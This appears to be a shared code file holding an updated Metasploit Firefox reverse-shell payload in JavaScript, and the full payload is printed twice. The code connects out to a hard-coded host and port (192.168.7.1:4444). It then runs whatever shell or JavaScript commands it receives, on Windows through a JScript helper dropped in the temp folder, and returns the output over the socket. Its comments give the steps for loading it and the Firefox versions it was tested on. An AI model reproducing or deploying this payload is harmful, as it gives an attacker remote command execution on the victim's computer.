atxsinn3r/firefox_shell_reverse_tcp_updated.js

## firefox_shell_reverse_tcp_updated.js
// This is a modified Metasploit payload firefox/shell_reverse_tcp
// As of May 14 2020, the current version in Metasploit is extremely out of date.
// Based on my testing, it probably stopped working since 2017 or earlier.
// Originally the payload was created by Joe Vennix in 2014.
// This payload has only been tested on Windows.
// To test this, load it in the web console, but make sure devtools.chrome.enabled is on,
// which by default is enabled in some versions.
// Versions tested:
// 60.0 (32-bit)

(function(){
        window = this;

        Components.utils.import("resource://gre/modules/NetUtil.jsm");
        var host = '192.168.7.1';
        var port = 4444;

        var socketTransport = Components.classes["@mozilla.org/network/socket-transport-service;1"].getService(Components.interfaces.nsISocketTransportService);
        var socket = socketTransport.createTransport([], 0, host, port, null);
        var outStream = socket.openOutputStream(0, 0, 0);
        var inStream = socket.openInputStream(0, 0, 0);

        var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"].createInstance(Components.interfaces.nsIInputStreamPump);
        pump.init(inStream, -1, -1, null, null, true);

      var readUntilToken = function(cb) {
        Components.utils.import("resource://gre/modules/NetUtil.jsm");

        var buffer = '', m = null;
        return function(request, context, stream, offset, count) {
          buffer += NetUtil.readInputStreamToString(stream, count);
          if (buffer.match(/^(\[\[\w{8}\]\])/)) {
            if (m = buffer.match(/^(\[\[\w{8}\]\])([\s\S]*)\1/)) {
              cb(m[2]);
              buffer = '';
            }
          } else if (buffer.indexOf("\n") > -1) {
            cb(buffer);
            buffer = '';
          }
        };
      };


        var listener = {
          onStartRequest: function(request, context) {},
          onStopRequest: function(request, context) {},
          onDataAvailable: readUntilToken(function(data) {
            runCmd(data, function(err, output) {
              if (!err) outStream.write(output, output.length);
            });
          })
        };


      var readFile = function(path) {
        try {
          var file = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFileWin);
          file.initWithPath(path);
          var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"].createInstance(Components.interfaces.nsIFileInputStream);
          fileStream.init(file, 1, 0, false);
          var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"].createInstance(Components.interfaces.nsIBinaryInputStream);
          binaryStream.setInputStream(fileStream);
          var array = binaryStream.readByteArray(fileStream.available());
          binaryStream.close();
          fileStream.close();
          file.remove(true);
          return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
        } catch (e) { return ""; }
      };


      var setTimeout = function(cb, delay) {
        var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
        timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
        return timer;
      };


      var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
      var windows = (ua.indexOf("Windows")>-1);
      //var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
      //Components.utils.import("resource://gre/modules/devtools/Console.jsm");
      //var svcs = Components.utils.importGlobalProperties(["atob", "btoa"]);
      var jscript = ({"src":"\n      var b64 = WScript.arguments(0);\n      var dom = new ActiveXObject(\"MSXML2.DOMDocument.3.0\");\n      var el  = dom.createElement(\"root\");\n      el.dataType = \"bin.base64\"; el.text = b64; dom.appendChild(el);\n      var stream = new ActiveXObject(\"ADODB.Stream\");\n      stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);\n      stream.Position=0; stream.type=2; stream.CharSet = \"us-ascii\"; stream.Position=0;\n      var cmd = stream.ReadText();\n      (new ActiveXObject(\"WScript.Shell\")).Run(cmd, 0, true);\n    "}).src;
      var runCmd = function(cmd, cb) {
        cb = cb || (function(){});

        if (cmd.trim().length == 0) {
          setTimeout(function(){ cb("Command is empty string ('')."); });
          return;
        }

        var js = (/^\s*\[JAVASCRIPT\]([\s\S]*)\[\/JAVASCRIPT\]/g).exec(cmd.trim());
        if (js) {
          var tag = "[!JAVASCRIPT]";
          var sync = true;  /* avoid zalgo's reach */
          var sent = false;
          var retVal = null;

          try {
            this.send = function(r){
              if (sent) return;
              sent = true;
              if (r) {
                if (sync) setTimeout(function(){ cb(false, r+tag+"\n"); });
                else      cb(false, r+tag+"\n");
              }
            };
            retVal = Function(js[1]).call(this);
          } catch (e) { retVal = e.message; }

          sync = false;

          if (retVal && !sent) {
            sent = true;
            setTimeout(function(){ cb(false, retVal+tag+"\n"); });
          }

          return;
        }

        var shEsc = "\\$&";
        var shPath = "/bin/sh -c";

        if (windows) {
          shPath = "cmd /c";
          shEsc = "\^$&";
          var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
            .getService(Components.interfaces.nsIProperties)
            .get("TmpD", Components.interfaces.nsIFile);
          jscriptFile.append('d61cNxKRo.js');
          var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
            .createInstance(Components.interfaces.nsIFileOutputStream);
          stream.init(jscriptFile, 0x04 | 0x08 | 0x20, 0666, 0);
          stream.write(jscript, jscript.length);
          if (stream instanceof Components.interfaces.nsISafeOutputStream) {
            stream.finish();
          } else {
            stream.close();
          }
        }

        var stdoutFile = "sKtRYx3Krj0TnCDPBe";

        var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
          .getService(Components.interfaces.nsIProperties)
          .get("TmpD", Components.interfaces.nsIFile);
        stdout.append(stdoutFile);

        var shell;
        cmd = cmd.trim();
        if (windows) {
          shell = shPath+" "+cmd;
          shell = shPath+" "+shell.replace(/\W/g, shEsc)+" >"+stdout.path+" 2>&1";
          var b64 = btoa(shell);
        } else {
          shell = shPath+" "+cmd.replace(/\W/g, shEsc);
          shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1";
        }

        var process = Components.classes["@mozilla.org/process/util;1"]
          .createInstance(Components.interfaces.nsIProcess);
        var sh = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFileWin);

        if (windows) {
          sh.initWithPath("C:\\Windows\\System32\\wscript.exe");
          process.init(sh);
          var args = [jscriptFile.path, b64];
          process.run(true, args, args.length);
          jscriptFile.remove(true);
          setTimeout(function(){cb(false, cmd+"\n"+readFile(stdout.path));});
        } else {
          sh.initWithPath("/bin/sh");
          process.init(sh);
          var args = ["-c", shell];
          process.run(true, args, args.length);
          setTimeout(function(){cb(false, readFile(stdout.path));});
        }
      };


        pump.asyncRead(listener, null);
      })();
	// This is a modified Metasploit payload firefox/shell_reverse_tcp
	// As of May 14 2020, the current version in Metasploit is extremely out of date.
	// Based on my testing, it probably stopped working since 2017 or earlier.
	// Originally the payload was created by Joe Vennix in 2014.
	// This payload has only been tested on Windows.
	// To test this, load it in the web console, but make sure devtools.chrome.enabled is on,
	// which by default is enabled in some versions.
	// Versions tested:
	// 60.0 (32-bit)

	(function(){
	window = this;

	Components.utils.import("resource://gre/modules/NetUtil.jsm");
	var host = '192.168.7.1';
	var port = 4444;

	var socketTransport = Components.classes["@mozilla.org/network/socket-transport-service;1"].getService(Components.interfaces.nsISocketTransportService);
	var socket = socketTransport.createTransport([], 0, host, port, null);
	var outStream = socket.openOutputStream(0, 0, 0);
	var inStream = socket.openInputStream(0, 0, 0);

	var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"].createInstance(Components.interfaces.nsIInputStreamPump);
	pump.init(inStream, -1, -1, null, null, true);

	var readUntilToken = function(cb) {
	Components.utils.import("resource://gre/modules/NetUtil.jsm");

	var buffer = '', m = null;
	return function(request, context, stream, offset, count) {
	buffer += NetUtil.readInputStreamToString(stream, count);
	if (buffer.match(/^(\[\[\w{8}\]\])/)) {
	if (m = buffer.match(/^(\[\[\w{8}\]\])([\s\S]*)\1/)) {
	cb(m[2]);
	buffer = '';
	}
	} else if (buffer.indexOf("\n") > -1) {
	cb(buffer);
	buffer = '';
	}
	};
	};


	var listener = {
	onStartRequest: function(request, context) {},
	onStopRequest: function(request, context) {},
	onDataAvailable: readUntilToken(function(data) {
	runCmd(data, function(err, output) {
	if (!err) outStream.write(output, output.length);
	});
	})
	};



	var readFile = function(path) {
	try {
	var file = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFileWin);
	file.initWithPath(path);
	var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"].createInstance(Components.interfaces.nsIFileInputStream);
	fileStream.init(file, 1, 0, false);
	var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"].createInstance(Components.interfaces.nsIBinaryInputStream);
	binaryStream.setInputStream(fileStream);
	var array = binaryStream.readByteArray(fileStream.available());
	binaryStream.close();
	fileStream.close();
	file.remove(true);
	return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
	} catch (e) { return ""; }
	};


	var setTimeout = function(cb, delay) {
	var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
	timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
	return timer;
	};


	var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
	.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
	var windows = (ua.indexOf("Windows")>-1);
	//var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
	//Components.utils.import("resource://gre/modules/devtools/Console.jsm");
	//var svcs = Components.utils.importGlobalProperties(["atob", "btoa"]);
	var jscript = ({"src":"\n var b64 = WScript.arguments(0);\n var dom = new ActiveXObject(\"MSXML2.DOMDocument.3.0\");\n var el = dom.createElement(\"root\");\n el.dataType = \"bin.base64\"; el.text = b64; dom.appendChild(el);\n var stream = new ActiveXObject(\"ADODB.Stream\");\n stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);\n stream.Position=0; stream.type=2; stream.CharSet = \"us-ascii\"; stream.Position=0;\n var cmd = stream.ReadText();\n (new ActiveXObject(\"WScript.Shell\")).Run(cmd, 0, true);\n "}).src;
	var runCmd = function(cmd, cb) {
	cb = cb \|\| (function(){});

	if (cmd.trim().length == 0) {
	setTimeout(function(){ cb("Command is empty string ('')."); });
	return;
	}

	var js = (/^\s\[JAVASCRIPT\]([\s\S])\[\/JAVASCRIPT\]/g).exec(cmd.trim());
	if (js) {
	var tag = "[!JAVASCRIPT]";
	var sync = true; /* avoid zalgo's reach */
	var sent = false;
	var retVal = null;

	try {
	this.send = function(r){
	if (sent) return;
	sent = true;
	if (r) {
	if (sync) setTimeout(function(){ cb(false, r+tag+"\n"); });
	else cb(false, r+tag+"\n");
	}
	};
	retVal = Function(js[1]).call(this);
	} catch (e) { retVal = e.message; }

	sync = false;

	if (retVal && !sent) {
	sent = true;
	setTimeout(function(){ cb(false, retVal+tag+"\n"); });
	}

	return;
	}

	var shEsc = "\\$&";
	var shPath = "/bin/sh -c";

	if (windows) {
	shPath = "cmd /c";
	shEsc = "\^$&";
	var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
	.getService(Components.interfaces.nsIProperties)
	.get("TmpD", Components.interfaces.nsIFile);
	jscriptFile.append('d61cNxKRo.js');
	var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
	.createInstance(Components.interfaces.nsIFileOutputStream);
	stream.init(jscriptFile, 0x04 \| 0x08 \| 0x20, 0666, 0);
	stream.write(jscript, jscript.length);
	if (stream instanceof Components.interfaces.nsISafeOutputStream) {
	stream.finish();
	} else {
	stream.close();
	}
	}

	var stdoutFile = "sKtRYx3Krj0TnCDPBe";

	var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
	.getService(Components.interfaces.nsIProperties)
	.get("TmpD", Components.interfaces.nsIFile);
	stdout.append(stdoutFile);

	var shell;
	cmd = cmd.trim();
	if (windows) {
	shell = shPath+" "+cmd;
	shell = shPath+" "+shell.replace(/\W/g, shEsc)+" >"+stdout.path+" 2>&1";
	var b64 = btoa(shell);
	} else {
	shell = shPath+" "+cmd.replace(/\W/g, shEsc);
	shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1";
	}

	var process = Components.classes["@mozilla.org/process/util;1"]
	.createInstance(Components.interfaces.nsIProcess);
	var sh = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFileWin);

	if (windows) {
	sh.initWithPath("C:\\Windows\\System32\\wscript.exe");
	process.init(sh);
	var args = [jscriptFile.path, b64];
	process.run(true, args, args.length);
	jscriptFile.remove(true);
	setTimeout(function(){cb(false, cmd+"\n"+readFile(stdout.path));});
	} else {
	sh.initWithPath("/bin/sh");
	process.init(sh);
	var args = ["-c", shell];
	process.run(true, args, args.length);
	setTimeout(function(){cb(false, readFile(stdout.path));});
	}
	};


	pump.asyncRead(listener, null);
	})();